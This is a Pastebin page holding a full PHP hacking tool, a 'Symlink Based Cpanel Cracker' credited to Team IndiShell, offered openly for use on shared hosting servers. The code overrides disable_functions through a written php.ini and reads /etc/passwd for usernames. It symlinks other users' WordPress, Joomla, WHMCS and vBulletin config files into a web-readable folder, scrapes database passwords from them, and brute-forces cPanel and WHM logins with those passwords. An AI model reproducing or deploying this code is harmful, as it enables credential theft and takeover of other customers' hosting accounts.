daily pastebin goal
1%
SHARE
TWEET

cstrike

a guest Dec 23rd, 2018 152 in 245 days
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  <?php
  2.  
  3.  
  4. $head = '
  5. <html>
  6. <head>
  7. </script>
  8. <title>--==[[ Don,Symlink Based Cpanel Cracker By Team IndiShell]]==--</title>
  9. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  10.  
  11. <STYLE>
  12. body {
  13. font-family: Tahoma
  14. }
  15. tr {
  16. BORDER: dashed 1px #333;
  17. color: #FFF;
  18. }
  19. td {
  20. BORDER: dashed 1px #333;
  21. color: #FFF;
  22. }
  23. .table1 {
  24. BORDER: 0px Black;
  25. BACKGROUND-COLOR: Black;
  26. color: #FFF;
  27. }
  28. .td1 {
  29. BORDER: 0px;
  30. BORDER-COLOR: #333333;
  31. font: 7pt Verdana;
  32. color: Green;
  33. }
  34. .tr1 {
  35. BORDER: 0px;
  36. BORDER-COLOR: #333333;
  37. color: #FFF;
  38. }
  39. table {
  40. BORDER: dashed 1px #333;
  41. BORDER-COLOR: #333333;
  42. BACKGROUND-COLOR: Black;
  43. color: #FFF;
  44. }
  45. input {
  46. border : solid 3px ;
  47. border-color : #333;
  48. BACKGROUND-COLOR: white;
  49. font: 11pt Verdana;
  50. color: #333;
  51. }
  52. select {
  53. BORDER-RIGHT: Black 1px solid;
  54. BORDER-TOP: #DF0000 1px solid;
  55. BORDER-LEFT: #DF0000 1px solid;
  56. BORDER-BOTTOM: Black 1px solid;
  57. BORDER-color: #FFF;
  58. BACKGROUND-COLOR: Black;
  59. font: 8pt Verdana;
  60. color: Red;
  61. }
  62. submit {
  63. BORDER: buttonhighlight 2px outset;
  64. BACKGROUND-COLOR: Black;
  65. width: 30%;
  66. color: #FFF;
  67. }
  68. textarea {
  69. border : dashed 1px #333;
  70. BACKGROUND-COLOR: Black;
  71. font: Fixedsys bold;
  72. color: #999;
  73. }
  74. BODY {
  75. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  76. margin: 1px;
  77. color: Red;
  78. background-color: Black;
  79. }
  80. .main {
  81. margin : -287px 0px 0px -490px;
  82. BORDER: dashed 1px #333;
  83. BORDER-COLOR: #333333;
  84. }
  85. .tt {
  86. background-color: Black;
  87. }
  88.  
  89. A:link {
  90. COLOR: White; TEXT-DECORATION: none
  91. }
  92. A:visited {
  93. COLOR: White; TEXT-DECORATION: none
  94. }
  95. A:hover {
  96. color: Red; TEXT-DECORATION: none
  97. }
  98. A:active {
  99. color: Red; TEXT-DECORATION: none
  100. }
  101. </STYLE>
  102. <script language=\'javascript\'>
  103. function hide_div(id)
  104. {
  105. document.getElementById(id).style.display = \'none\';
  106. document.cookie=id+\'=0;\';
  107. }
  108. function show_div(id)
  109. {
  110. document.getElementById(id).style.display = \'block\';
  111. document.cookie=id+\'=1;\';
  112. }
  113. function change_divst(id)
  114. {
  115. if (document.getElementById(id).style.display == \'none\')
  116. show_div(id);
  117. else
  118. hide_div(id);
  119. }
  120. </script>'; ?>
  121. <html>
  122. <head>
  123. <?php
  124. echo $head ;
  125. echo '
  126.  
  127. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
  128.  
  129.  
  130.  
  131. <td width="100%" align=center valign="top" rowspan="1"><font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ d0n ]]==--</font><br>
  132. <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Symlink Based</font><font color=white size=5 face="comic sans ms"><b> CPanel Cracker By</font><font color=green size=5 face="comic sans ms"><b> Team IndiShell ]]==--</font> <div class="hedr">
  133.  
  134. <td height="10" align="left" class="td1"></td></tr><tr><td
  135. width="100%" align="center" valign="top" rowspan="1"><font
  136. color="red" face="comic sans ms"size="1"><b>
  137. <font color=#ff9933>
  138. ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br><font color=#ff9933> Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell,cool toad,cool shavik<br>Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,cyber warrior,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Mannu, ViKi ,Budhaoo, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand and rest of TEAM INDISHELL<br>
  139.  
  140. <font color=white>--==[[Dedicated to]]==--</font>
  141. <br># My Father and my Ex Teacher #<br><font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font><br><font color=#ff9933>
  142. ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>
  143.  
  144. </table>
  145. </table> <div align=center><font color=#ff9933 font size=5><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="30" width="70%"><span class="footerlink">love happen only once.....Rest is life......</span></marquee><br></font></div><div align=center><table width=50%><font color=#ff9933 font size=5>--==[[ Code for India,Hack for India,Die for India ]]==--</font></table>
  146.  
  147. ';
  148.  
  149. ?>
  150. <body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
  151. <form method=post>
  152. <input type=submit name=ini value="Generate PHP.ini" /></form>
  153. <?php
  154. if(isset($_POST['ini']))
  155. {
  156.  
  157. $r=fopen('php.ini','w');
  158. $rr=" disable_functions=none ";
  159. fwrite($r,$rr);
  160. $link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
  161. echo $link;
  162.  
  163. }
  164. ?>
  165. <p>\\\\\\\\\\\\\\\\\\\\\\\\ Symlink based cpanel cracking wala jugaad XD ///////////////////////
  166. <?php
  167. //////////////////////////////////////
  168. /////    mass symlink       ////////
  169. //////////////////////////////////////
  170. ?>
  171. <form method=post>
  172. <input type=submit name="usre" value="click to Extract usernames and mass symlink" /></form>
  173.  
  174.  
  175.  
  176.  
  177. <?php
  178. if(isset($_POST['usre'])){
  179. ?><form method=post>
  180. <textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
  181. foreach($users as $user)
  182. {
  183. $str=explode(":",$user);
  184. echo $str[0]."\n";
  185. }
  186.  
  187. ?></textarea><br><br>
  188. <input type=submit name=su value="bhaiyu ^_^ .. lets start" /></form>
  189. <?php } ?>
  190. <?php
  191. error_reporting(0);
  192. echo "<font color=red size=2 face=\"comic sans ms\">";
  193. if(isset($_POST['su']))
  194. {
  195.  
  196. $dir=mkdir('IcA',0777);
  197. $r = " Options all \n DirectoryIndex ICA.html \n Require None \n Satisfy Any";
  198. $f = fopen('IcA/.htaccess','w');
  199.  
  200. fwrite($f,$r);
  201. $consym="<a href=IcA/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
  202. echo "<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  203.  
  204. $usr=explode("\n",$_POST['user']);
  205.  
  206. foreach($usr as $uss )
  207. {
  208. $us=trim($uss);
  209.  
  210. $r="IcA/";
  211. symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
  212. symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
  213. symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
  214. symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
  215. symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
  216. symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
  217. symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
  218. symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
  219. symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
  220. symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
  221. symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
  222. symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
  223. symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
  224. symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
  225. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
  226. symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
  227. symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
  228. symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
  229. symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
  230. symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
  231. symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
  232. symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
  233. symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
  234. symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
  235. symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
  236. symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
  237. }
  238. }
  239. ?>
  240. <?php
  241. //////////////////////////////////////
  242. /////password grabbing section////////
  243. //////////////////////////////////////
  244. ?>
  245.  
  246.  
  247.  
  248. <form method=post>
  249. <input type=submit name=sm value="start grabbing passwords from configuration files"></form>
  250. <?php
  251. error_reporting(0);
  252. set_time_limit(0);
  253. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  254. {
  255.  
  256. $ar0=explode($marqueurDebutLien, $text);
  257. $ar1=explode($marqueurFinLien, $ar0[1]);
  258. $ar=trim($ar1[0]);
  259. return $ar;
  260. }
  261.  
  262. if(isset($_POST['sm']))
  263.  
  264. {
  265. echo "bhai ji ... have a cup of tea.. tab tak main is server ki jaan nikalta hoon :P";
  266. $ffile=fopen('r.txt','a+');
  267.  
  268.  
  269. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/IcA/";
  270. $re=$r;
  271. $confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  272.  
  273. $users=file("/etc/passwd");
  274. foreach($users as $user)
  275. {
  276.  
  277. $str=explode(":",$user);
  278. $usersss=$str[0];
  279. foreach($confi as $co)
  280. {
  281.  
  282.  
  283. $uurl=$re.$usersss.$co;
  284. $uel=$uurl;
  285.  
  286. $ch = curl_init();
  287.  
  288. curl_setopt($ch, CURLOPT_URL, $uel);
  289. curl_setopt($ch, CURLOPT_HEADER, 1);
  290. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  291. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  292. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  293. $result['EXE'] = curl_exec($ch);
  294. curl_close($ch);
  295. $uxl=$result['EXE'];
  296.  
  297.  
  298. if($uxl && preg_match('/table_prefix/i',$uxl))
  299. {
  300.  
  301. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website cms is wordpress </font></td></tr></table>";
  302.  
  303.  echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  304. if(!empty($dbp))
  305. $pass=$dbp."\n";
  306. fwrite($ffile,$pass);
  307.  
  308. }
  309. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  310. {
  311.  
  312. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website whmcs bhaiyu xD </font></td></tr></table>";
  313.  
  314. echo $dbp=entre2v2($uxl,"db_password = '","';");
  315. if(!empty($dbp))
  316. $pass=$dbp."\n";
  317. fwrite($ffile,$pass);
  318.  
  319. }
  320.  
  321.  
  322. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  323. {
  324.  
  325. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's  website cms is joomla </font></td></tr></table>";
  326.  
  327. echo $db=entre2v2($uxl,"password = '","';");
  328. if(!empty($db))
  329. $pass=$db."\n";
  330. fwrite($ffile,$pass);
  331. }
  332. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  333. {
  334.  
  335. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss  user's website cms is vbulletin </font></td></tr></table>";
  336.  
  337. echo $db=entre2v2($uxl,"password'] = '","';");
  338. if(!empty($db))
  339. $pass=$db."\n";
  340. fwrite($ffile,$pass);
  341.  
  342. }
  343. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  344. {
  345.  
  346. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss  </font></td></tr></table>";
  347.  
  348. echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  349. if(!empty($db))
  350. $pass=$db."\n";
  351. fwrite($ffile,$pass);
  352. }
  353. elseif($uxl && preg_match('/dbpass/i',$uxl))
  354. {
  355.  
  356. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  357.  
  358. echo $db=entre2v2($uxl,"dbpass = '","';");
  359. if(!empty($db))
  360. $pass=$db."\n";
  361. fwrite($ffile,$pass);
  362. }
  363. elseif($uxl && preg_match('/dbpass/i',$uxl))
  364. {
  365.  
  366. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss  </font></td></tr></table>";
  367.  
  368. echo $db=entre2v2($uxl,"dbpass = '","';");
  369. if(!empty($db))
  370. $pass=$db."\n";
  371. fwrite($ffile,$pass);
  372.  
  373. }
  374. elseif($uxl && preg_match('/dbpass/i',$uxl))
  375. {
  376.  
  377. echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
  378.  
  379. echo $db=entre2v2($uxl,"dbpass = \"","\";");
  380. if(!empty($db))
  381. $pass=$db."\n";
  382. fwrite($ffile,$pass);
  383. }
  384.  
  385.  
  386. }
  387. }
  388. }
  389. ?>
  390. <?php
  391. /////////////////////////////////
  392. /////   cpanel cracker    ///////
  393. /////////////////////////////////
  394. ?>
  395.  
  396.  
  397. <form method=post>
  398. <input type=submit name=cpanel value="Auto username/password loading cpanel cracker"><p>
  399. <?php
  400.  
  401. if(isset($_POST['cpanel']))
  402. {
  403. ?>
  404. <form method=post><div align=center><table>
  405. want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
  406. <option name="op" value="whm">WHMPanel</option></table><p>
  407. <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
  408. foreach($users as $user)
  409. {
  410. $str=explode(":",$user);
  411. echo $str[0]."\n";
  412. }
  413.  
  414. ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
  415. <?php
  416.  
  417. $d=getcwd()."/r.txt";
  418. $pf=file($d);
  419. foreach($pf as $rt)
  420. {
  421. $str=explode('\n',$rt);
  422. echo trim($str[0])."\n";
  423. } ?></textarea><p>
  424. <input type=submit name=cpanelcracking value="kerde khaat khadi >.<"></form>
  425. <?php
  426. }
  427. ?>
  428.  
  429.  
  430.  
  431.  
  432. <?php
  433. error_reporting(0);
  434. $connect_timeout=5;
  435. set_time_limit(0);
  436.  
  437. $userl=$_POST['usernames'];
  438. $passl=$_POST['passwords'];
  439. $attack=$_POST['op'];
  440. $target = "localhost";
  441.  
  442. if(isset($_POST['cpanelcracking']))
  443. {
  444. if($userl!=="" && $passl!=="")
  445. {
  446. if($_POST["op"]=="cp")
  447. {
  448. $cracked=$_POST['crack'];
  449. @fopen($cracked,'a');
  450. echo "bhai ji ^_^ ......now we are attacking cpanels....please wait till the end of process \n";
  451.  
  452.  
  453. }
  454. elseif($_POST["op"]=="whm")
  455. {
  456. @fopen($cracked,'a');
  457. echo "bhai ji ^_^ ......now we are attacking WHM panel....please wait till the end of process";
  458.  
  459. }
  460.  
  461. function cpanel($host,$user,$pass,$timeout){
  462. $ch = curl_init();
  463. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
  464. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  465. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  466. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  467. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  468. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  469. $data = curl_exec($ch);
  470. if ( curl_errno($ch) == 0 ){
  471. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  472.  
  473.  
  474. }
  475.  
  476. curl_close($ch);}
  477.  
  478. $userlist=explode("\n",$userl);
  479. $passlist=explode("\n",$passl);
  480.  
  481. if ($attack == "cp")
  482. {
  483. foreach ($userlist as $user) {
  484. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
  485. $finaluser = trim($user);
  486. foreach ($passlist as $password ) {
  487. $finalpass = trim($password);
  488.  
  489.  
  490. cpanel($target,$finaluser,$finalpass,$connect_timeout);
  491.  
  492. }
  493. }
  494.  
  495. }
  496.  
  497. function whm($host,$user,$pass,$timeout){
  498. $ch = curl_init();
  499. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
  500. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  501. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  502. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  503. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  504. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  505. $data = curl_exec($ch);
  506. if ( curl_errno($ch) == 0 ){
  507. echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
  508.  
  509.  
  510.  
  511.  
  512. }
  513.  
  514.  
  515. curl_close($ch);}
  516. $userlist=explode("\n",$userl);
  517. $passlist=explode("\n",$passl);
  518.  
  519. if ($attack == "whm")
  520. {
  521. foreach ($userlist as $user) {
  522. echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
  523. $finaluser = trim($user);
  524. foreach ($passlist as $password ) {
  525. $finalpass = trim($password);
  526.  
  527. whm($target,$finaluser,$finalpass,$connect_timeout);
  528. }
  529. }
  530. }
  531. }
  532. elseif($userl=="")
  533. {
  534. echo "what are you doing bhai ji :( , you have left userlist field empty";
  535.  
  536. }
  537. elseif($passl=="")
  538. {
  539.  
  540. echo "bhai ji :( ... please put passwords in paasword list field";
  541. }
  542. }
  543. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top